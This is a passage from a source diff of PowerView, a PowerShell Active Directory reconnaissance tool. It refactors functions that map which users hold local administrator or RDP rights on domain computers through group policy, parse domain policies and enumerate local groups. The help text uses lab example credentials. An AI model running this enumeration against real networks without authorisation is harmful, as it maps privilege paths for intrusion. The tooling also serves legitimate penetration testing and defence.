+Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to
+enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For
+each resulting GPO group, resolve the resulting user/group name to a full AD object and
+return the results. This will return the domain objects that are members of the specified
+-LocalGroup for the given computer.
+
+Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
+localgroup specifications.
+
+.PARAMETER ComputerIdentity
+
+A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g. windows10.testlab.local) for the computer to identity GPO local group mappings for.
+
+.PARAMETER OUIdentity
+
+An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.
- Takes a computer (or GPO) object and determines what users/groups are in the specified
- local group for the machine.
+.PARAMETER LocalGroup
- Author: @harmj0y
- License: BSD 3-Clause
- Required Dependencies: Get-NetComputer, Get-SiteName, Get-NetSite, Get-NetGPOGroup, Get-ADObject, Get-NetGroupMember, Convert-SidToName
- Optional Dependencies: None
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID. Defaults to local 'Administrators'.
- .DESCRIPTION
-
- If a -ComputerName is specified, retrieve the complete computer object, attempt to
- determine the OU the computer is a part of. Then resolve the computer's site name with
- Get-SiteName and retrieve all sites object Get-NetSite. For those results, attempt to
- enumerate all linked GPOs and associated local group settings with Get-NetGPOGroup. For
- each resulting GPO group, resolve the resulting user/group name to a full AD object and
- return the results. This will return the domain objects that are members of the specified
- -LocalGroup for the given computer.
+.PARAMETER Domain
- Inverse of Find-GPOLocation.
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
- .PARAMETER ComputerName
+.PARAMETER Server
- The computer to determine local administrative access to.
+Specifies an Active Directory server (domain controller) to bind to.
- .PARAMETER OUName
+.PARAMETER SearchScope
- OU name to determine who has local adminisrtative acess to computers
- within it.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- .PARAMETER Domain
+.PARAMETER ResultPageSize
- Optional domain the computer/OU exists in, defaults to the current domain.
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER DomainController
+.PARAMETER ServerTimeLimit
- Domain controller to reflect LDAP queries through.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .PARAMETER Recurse
+.PARAMETER Tombstone
- Switch. If a returned member is a group, recurse and get all members.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .PARAMETER LocalGroup
+.PARAMETER Credential
- The local group to check access against.
- Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
- or a custom local SID.
- Defaults to local 'Administrators'.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .PARAMETER UsePSDrive
+.EXAMPLE
- Switch. Mount any found policy files with temporary PSDrives.
+Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
- .PARAMETER PageSize
+Finds users who have local admin rights over WINDOWS3 through GPO correlation.
- The PageSize to set for the LDAP searcher object.
+.EXAMPLE
- .EXAMPLE
+Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
- PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local
-
- Finds users who have local admin rights over WINDOWS3 through GPO correlation.
+Finds users who have RDP rights over WINDOWS4 through GPO correlation.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local -LocalGroup RDP
-
- Finds users who have RDP rights over WINDOWS3 through GPO correlation.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local
+
+.OUTPUTS
+
+PowerView.GGPOComputerLocalGroupMember
#>
- [CmdletBinding()]
- Param (
- [Parameter(ValueFromPipeline=$True)]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.GGPOComputerLocalGroupMember')]
+ [CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')]
+ Param(
+ [Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')]
[String]
- $ComputerName,
+ $ComputerIdentity,
+ [Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')]
+ [Alias('OU')]
[String]
- $OUName,
+ $OUIdentity,
[String]
+ [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
+ $LocalGroup = 'Administrators',
+
+ [ValidateNotNullOrEmpty()]
+ [String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $DomainController,
+ $SearchBase,
- [Switch]
- $Recurse,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $LocalGroup = 'Administrators',
+ $SearchScope = 'Subtree',
- [Switch]
- $UsePSDrive,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200
- )
+ $ServerTimeLimit,
- process {
-
- if(!$ComputerName -and !$OUName) {
- Throw "-ComputerName or -OUName must be provided"
- }
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- $GPOGroups = @()
+ BEGIN {
+ $CommonArguments = @{}
+ if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }
+ }
- if($ComputerName) {
- $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize
+ PROCESS {
+ if ($PSBoundParameters['ComputerIdentity']) {
+ $Computers = Get-DomainComputer @CommonArguments -Identity $ComputerIdentity -Properties 'distinguishedname,dnshostname'
- if(!$Computers) {
- throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name"
+ if (-not $Computers) {
+ throw "[Get-DomainGPOComputerLocalGroupMapping] Computer $ComputerIdentity not found. Try a fully qualified host name."
}
-
- $TargetOUs = @()
- ForEach($Computer in $Computers) {
- # extract all OUs a computer is a part of
- $DN = $Computer.distinguishedname
- $TargetOUs += $DN.split(",") | ForEach-Object {
- if($_.startswith("OU=")) {
- $DN.substring($DN.indexof($_))
+ ForEach ($Computer in $Computers) {
+
+ $GPOGuids = @()
+
+ # extract any GPOs linked to this computer's OU through gpLink
+ $DN = $Computer.distinguishedname
+ $OUIndex = $DN.IndexOf('OU=')
+ if ($OUIndex -gt 0) {
+ $OUName = $DN.SubString($OUIndex)
+ }
+ if ($OUName) {
+ $GPOGuids += Get-DomainOU @CommonArguments -SearchBase $OUName -LDAPFilter '(gplink=*)' | ForEach-Object {
+ Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }
}
}
- }
- # enumerate any linked GPOs for the computer's site
- $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName
- if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
- $GPOGroups += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object {
- if($_.gplink) {
- $_.gplink.split("][") | ForEach-Object {
- if ($_.startswith("LDAP")) {
- $_.split(";")[0]
- }
- }
- }
- } | ForEach-Object {
- $GPOGroupArgs = @{
- 'Domain' = $Domain
- 'DomainController' = $DomainController
- 'ResolveMemberSIDs' = $True
- 'UsePSDrive' = $UsePSDrive
- 'PageSize' = $PageSize
+ # extract any GPOs linked to this computer's site through gpLink
+ Write-Verbose "Enumerating the sitename for: $($Computer.dnshostname)"
+ $ComputerSite = (Get-NetComputerSiteName -ComputerName $Computer.dnshostname).SiteName
+ if ($ComputerSite -and ($ComputerSite -notmatch 'Error')) {
+ $GPOGuids += Get-DomainSite @CommonArguments -Identity $ComputerSite -LDAPFilter '(gplink=*)' | ForEach-Object {
+ Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }
}
-
- # for each GPO link, get any locally set user/group SIDs
- Get-NetGPOGroup @GPOGroupArgs
}
- }
- }
- else {
- $TargetOUs = @($OUName)
- }
-
- Write-Verbose "Target OUs: $TargetOUs"
- $TargetOUs | Where-Object {$_} | ForEach-Object {
+ # process any GPO local group settings from the GPO GUID set
+ $GPOGuids | Get-DomainGPOLocalGroup @CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object {
+ $GPOGroup = $_
- $GPOLinks = Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $_ -FullData -PageSize $PageSize | ForEach-Object {
- # and then get any GPO links
- if($_.gplink) {
- $_.gplink.split("][") | ForEach-Object {
- if ($_.startswith("LDAP")) {
- $_.split(";")[0]
- }
+ if($GPOGroup.GroupMembers) {
+ $GPOMembers = $GPOGroup.GroupMembers
+ }
+ else {
+ $GPOMembers = $GPOGroup.GroupSID
}
- }
- }
-
- $GPOGroupArgs = @{
- 'Domain' = $Domain
- 'DomainController' = $DomainController
- 'UsePSDrive' = $UsePSDrive
- 'ResolveMemberSIDs' = $True
- 'PageSize' = $PageSize
- }
- # extract GPO groups that are set through any gPlink for this OU
- $GPOGroups += Get-NetGPOGroup @GPOGroupArgs | ForEach-Object {
- ForEach($GPOLink in $GPOLinks) {
- $Name = $_.GPOName
- if($GPOLink -like "*$Name*") {
- $_
+ $GPOMembers | ForEach-Object {
+ $Object = Get-DomainObject @CommonArguments -Identity $_
+ $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+
+ $GPOComputerLocalGroupMember = New-Object PSObject
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ComputerName' $Computer.dnshostname
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectSID' $_
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath
+ $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType
+ $GPOComputerLocalGroupMember.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember')
+ $GPOComputerLocalGroupMember
}
}
}
}
+ }
+}
- # for each found GPO group, resolve the SIDs of the members
- $GPOgroups | Sort-Object -Property GPOName -Unique | ForEach-Object {
- $GPOGroup = $_
- if($GPOGroup.GroupMembers) {
- $GPOMembers = $GPOGroup.GroupMembers
- }
- else {
- $GPOMembers = $GPOGroup.GroupSID
- }
+function Get-DomainPolicyData {
+<#
+.SYNOPSIS
- $GPOMembers | ForEach-Object {
- # resolve this SID to a domain object
- $Object = Get-ADObject -Domain $Domain -DomainController $DomainController -PageSize $PageSize -SID $_
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller.
- $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID
- $GPOComputerAdmin = New-Object PSObject
- $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName
- $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
- $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
- $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_
- $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $IsGroup
- $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName
- $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName
- $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath
- $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType
- $GPOComputerAdmin
+.DESCRIPTION
- # if we're recursing and the current result object is a group
- if($Recurse -and $GPOComputerAdmin.isGroup) {
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller using Get-DomainGPO.
- Get-NetGroupMember -Domain $Domain -DomainController $DomainController -SID $_ -FullData -Recurse -PageSize $PageSize | ForEach-Object {
+.PARAMETER Domain
- $MemberDN = $_.distinguishedName
+The domain to query for default policies, defaults to the current domain.
- # extract the FQDN from the Distinguished Name
- $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
+.PARAMETER Policy
- $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype
+Extract 'Domain', 'DC' (domain controller) policies, or 'All' for all policies.
+Otherwise queries for the particular GPO name or GUID.
- if ($_.samAccountName) {
- # forest users have the samAccountName set
- $MemberName = $_.samAccountName
- }
- else {
- # external trust users have a SID, so convert it
- try {
- $MemberName = Convert-SidToName $_.cn
- }
- catch {
- # if there's a problem contacting the domain to resolve the SID
- $MemberName = $_.cn
- }
- }
+.PARAMETER Server
- $GPOComputerAdmin = New-Object PSObject
- $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName
- $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $MemberName
- $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $MemberDN
- $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_.objectsid
- $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $MemberIsGrou
- $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName
- $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName
- $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath
- $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOTypep
- $GPOComputerAdmin
- }
- }
- }
- }
- }
-}
+Specifies an Active Directory server (domain controller) to bind to.
+.PARAMETER ServerTimeLimit
-function Get-DomainPolicy {
-<#
- .SYNOPSIS
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Credential
- Returns the default domain or DC policy for a given
- domain or domain controller.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- Thanks Sean Metacalf (@pyrotek3) for the idea and guidance.
+.EXAMPLE
- .PARAMETER Source
+Get-DomainPolicyData
- Extract Domain or DC (domain controller) policies.
+Returns the default domain policy for the current domain.
- .PARAMETER Domain
+.EXAMPLE
- The domain to query for default policies, defaults to the current domain.
+Get-DomainPolicyData -Domain dev.testlab.local
- .PARAMETER DomainController
+Returns the default domain policy for the dev.testlab.local domain.
- Domain controller to reflect LDAP queries through.
+.EXAMPLE
- .PARAMETER ResolveSids
+Get-DomainGPO | Get-DomainPolicy
- Switch. Resolve Sids from a DC policy to object names.
+Parses any GptTmpl.infs found for any policies in the current domain.
- .PARAMETER UsePSDrive
+.EXAMPLE
- Switch. Mount any found policy files with temporary PSDrives.
+Get-DomainPolicyData -Policy DC -Domain dev.testlab.local
- .EXAMPLE
+Returns the policy for the dev.testlab.local domain controller.
- PS C:\> Get-DomainPolicy
+.EXAMPLE
- Returns the domain policy for the current domain.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainPolicyData -Credential $Cred
- .EXAMPLE
+.OUTPUTS
- PS C:\> Get-DomainPolicy -Source DC -DomainController MASTER.testlab.local
+Hashtable
- Returns the policy for the MASTER.testlab.local domain controller.
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([Hashtable])]
[CmdletBinding()]
- Param (
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Source', 'Name')]
[String]
- [ValidateSet("Domain","DC")]
- $Source ="Domain",
+ $Policy = 'Domain',
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $DomainController,
+ $Server,
- [Switch]
- $ResolveSids,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- [Switch]
- $UsePSDrive
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- if($Source -eq "Domain") {
- # query the given domain for the default domain policy object
- $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{31B2F340-016D-11D2-945F-00C04FB984F9}"
-
- if($GPO) {
- # grab the GptTmpl.inf file and parse it
- $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
- $ParseArgs = @{
- 'GptTmplPath' = $GptTmplPath
- 'UsePSDrive' = $UsePSDrive
- }
+ $ConvertArguments = @{}
+ if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
+ }
- # parse the GptTmpl.inf
- Get-GptTmpl @ParseArgs
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $SearcherArguments['Domain'] = $Domain
+ $ConvertArguments['Domain'] = $Domain
}
- }
- elseif($Source -eq "DC") {
- # query the given domain/dc for the default domain controller policy object
- $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{6AC1786C-016F-11D2-945F-00C04FB984F9}"
+ if ($Policy -eq 'All') {
+ $SearcherArguments['Identity'] = '*'
+ }
+ elseif ($Policy -eq 'Domain') {
+ $SearcherArguments['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}'
+ }
+ elseif (($Policy -eq 'DomainController') -or ($Policy -eq 'DC')) {
+ $SearcherArguments['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}'
+ }
+ else {
+ $SearcherArguments['Identity'] = $Policy
+ }
+
+ $GPOResults = Get-DomainGPO @SearcherArguments
- if($GPO) {
+ ForEach ($GPO in $GPOResults) {
# grab the GptTmpl.inf file and parse it
$GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
$ParseArgs = @{
'GptTmplPath' = $GptTmplPath
- 'UsePSDrive' = $UsePSDrive
+ 'OutputObject' = $True
}
+ if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
# parse the GptTmpl.inf
Get-GptTmpl @ParseArgs | ForEach-Object {
- if($ResolveSids) {
- # if we're resolving sids in PrivilegeRights to names
- $Policy = New-Object PSObject
- $_.psobject.properties | ForEach-Object {
- if( $_.Name -eq 'PrivilegeRights') {
-
- $PrivilegeRights = New-Object PSObject
- # for every nested SID member of PrivilegeRights, try to unpack everything and resolve the SIDs as appropriate
- $_.Value.psobject.properties | ForEach-Object {
-
- $Sids = $_.Value | ForEach-Object {
- try {
- if($_ -isnot [System.Array]) {
- Convert-SidToName $_
- }
- else {
- $_ | ForEach-Object { Convert-SidToName $_ }
- }
- }
- catch {
- Write-Verbose "Error resolving SID : $_"
- }
- }
-
- $PrivilegeRights | Add-Member Noteproperty $_.Name $Sids
- }
-
- $Policy | Add-Member Noteproperty 'PrivilegeRights' $PrivilegeRights
- }
- else {
- $Policy | Add-Member Noteproperty $_.Name $_.Value
- }
- }
- $Policy
- }
- else { $_ }
+ $_ | Add-Member Noteproperty 'GPOName' $GPO.name
+ $_ | Add-Member Noteproperty 'GPODisplayName' $GPO.displayname
+ $_
}
}
}
}
-
########################################################
#
# Functions that enumerate a single host, either through
-# WinNT, WMI, remote registry, or API calls
+# WinNT, WMI, remote registry, or API calls
# (with PSReflect).
#
########################################################
function Get-NetLocalGroup {
<#
- .SYNOPSIS
+.SYNOPSIS
- Gets a list of all current users in a specified local group,
- or returns the names of all local groups with -ListGroups.
+Enumerates the local groups on the local (or remote) machine.
- .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
- The hostname or IP to query for local group users.
+.DESCRIPTION
- .PARAMETER ComputerFile
+This function will enumerate the names and descriptions for the
+local groups on the current, or remote, machine. By default, the Win32 API
+call NetLocalGroupEnum will be used (for speed). Specifying "-Method WinNT"
+causes the WinNT service provider to be used instead, which returns group
+SIDs along with the group names and descriptions/comments.
- File of hostnames/IPs to query for local group users.
+.PARAMETER ComputerName
- .PARAMETER GroupName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
- The local group name to query for users. If not given, it defaults to "Administrators"
+.PARAMETER Method
- .PARAMETER ListGroups
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
- Switch. List all the local groups instead of their members.
- Old Get-NetLocalGroups functionality.
+.PARAMETER Credential
- .PARAMETER Recurse
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to a remote machine. Only applicable with "-Method WinNT".
- Switch. If the local member member is a domain group, recursively try to resolve its members to get a list of domain users who can access this machine.
+.EXAMPLE
- .PARAMETER API
+Get-NetLocalGroup
- Switch. Use API calls instead of the WinNT service provider. Less information,
- but the results are faster.
+ComputerName GroupName Comment
+------------ --------- -------
+WINDOWS1 Administrators Administrators have comple...
+WINDOWS1 Backup Operators Backup Operators can overr...
+WINDOWS1 Cryptographic Operators Members are authorized to ...
+...
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetLocalGroup
+Get-NetLocalGroup -Method Winnt
- Returns the usernames that of members of localgroup "Administrators" on the local host.
+ComputerName GroupName GroupSID Comment
+------------ --------- -------- -------
+WINDOWS1 Administrators S-1-5-32-544 Administrators hav...
+WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c...
+WINDOWS1 Cryptographic Opera... S-1-5-32-569 Members are author...
+...
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetLocalGroup -ComputerName WINDOWSXP
+Get-NetLocalGroup -ComputerName primary.testlab.local
- Returns all the local administrator accounts for WINDOWSXP
+ComputerName GroupName Comment
+------------ --------- -------
+primary.testlab.local Administrators Administrators have comple...
+primary.testlab.local Users Users are prevented from m...
+primary.testlab.local Guests Guests have the same acces...
+primary.testlab.local Print Operators Members can administer dom...
+primary.testlab.local Backup Operators Backup Operators can overr...
- .EXAMPLE
+.OUTPUTS
- PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -Recurse
+PowerView.LocalGroup.API
- Returns all effective local/domain users/groups that can access WINDOWS7 with
- local administrative privileges.
+Custom PSObject with translated group property fields from API results.
- .EXAMPLE
+PowerView.LocalGroup.WinNT
- PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -ListGroups
+Custom PSObject with translated group property fields from WinNT results.
- Returns all local groups on the WINDOWS7 host.
+.LINK
- .EXAMPLE
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx
+#>
- PS C:\> "WINDOWS7", "WINDOWSSP" | Get-NetLocalGroup -API
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.LocalGroup.API')]
+ [OutputType('PowerView.LocalGroup.WinNT')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = $Env:COMPUTERNAME,
- Returns all local groups on the the passed hosts using API calls instead of the
- WinNT service provider.
+ [ValidateSet('API', 'WinNT')]
+ [Alias('CollectionMethod')]
+ [String]
+ $Method = 'API',
- .LINK
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
- http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
-#>
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
- [CmdletBinding(DefaultParameterSetName = 'WinNT')]
- param(
- [Parameter(ParameterSetName = 'API', Position=0, ValueFromPipeline=$True)]
- [Parameter(ParameterSetName = 'WinNT', Position=0, ValueFromPipeline=$True)]
- [Alias('HostName')]
- [String[]]
- $ComputerName = $Env:ComputerName,
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ if ($Method -eq 'API') {
+ # if we're using the Netapi32 NetLocalGroupEnum API call to get the local group information
- [Parameter(ParameterSetName = 'WinNT')]
- [Parameter(ParameterSetName = 'API')]
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
- [String]
- $ComputerFile,
+ # arguments for NetLocalGroupEnum
+ $QueryLevel = 1
+ $PtrInfo = [IntPtr]::Zero
+ $EntriesRead = 0
+ $TotalRead = 0
+ $ResumeHandle = 0
- [Parameter(ParameterSetName = 'WinNT')]
- [Parameter(ParameterSetName = 'API')]
- [String]
- $GroupName = 'Administrators',
+ # get the local user information
+ $Result = $Netapi32::NetLocalGroupEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
- [Parameter(ParameterSetName = 'WinNT')]
- [Switch]
- $ListGroups,
+ # locate the offset of the initial intPtr
+ $Offset = $PtrInfo.ToInt64()
- [Parameter(ParameterSetName = 'WinNT')]
- [Switch]
- $Recurse,
+ # 0 = success
+ if (($Result -eq 0) -and ($Offset -gt 0)) {
- [Parameter(ParameterSetName = 'API')]
- [Switch]
- $API
- )
+ # Work out how much to increment the pointer by finding out the size of the structure
+ $Increment = $LOCALGROUP_INFO_1::GetSize()
- process {
+ # parse all the result structures
+ for ($i = 0; ($i -lt $EntriesRead); $i++) {
+ # create a new int ptr at the given offset and cast the pointer as our result structure
+ $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+ $Info = $NewIntPtr -as $LOCALGROUP_INFO_1
- $Servers = @()
+ $Offset = $NewIntPtr.ToInt64()
+ $Offset += $Increment
- # if we have a host list passed, grab it
- if($ComputerFile) {
- $Servers = Get-Content -Path $ComputerFile
+ $LocalGroup = New-Object PSObject
+ $LocalGroup | Add-Member Noteproperty 'ComputerName' $Computer
+ $LocalGroup | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name
+ $LocalGroup | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment
+ $LocalGroup.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API')
+ $LocalGroup
+ }
+ # free up the result buffer
+ $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+ }
+ else {
+ Write-Verbose "[Get-NetLocalGroup] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+ }
+ }
+ else {
+ # otherwise we're using the WinNT service provider
+ $ComputerProvider = [ADSI]"WinNT://$Computer,computer"
+
+ $ComputerProvider.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object {
+ $LocalGroup = ([ADSI]$_)
+ $Group = New-Object PSObject
+ $Group | Add-Member Noteproperty 'ComputerName' $Computer
+ $Group | Add-Member Noteproperty 'GroupName' ($LocalGroup.InvokeGet('Name'))
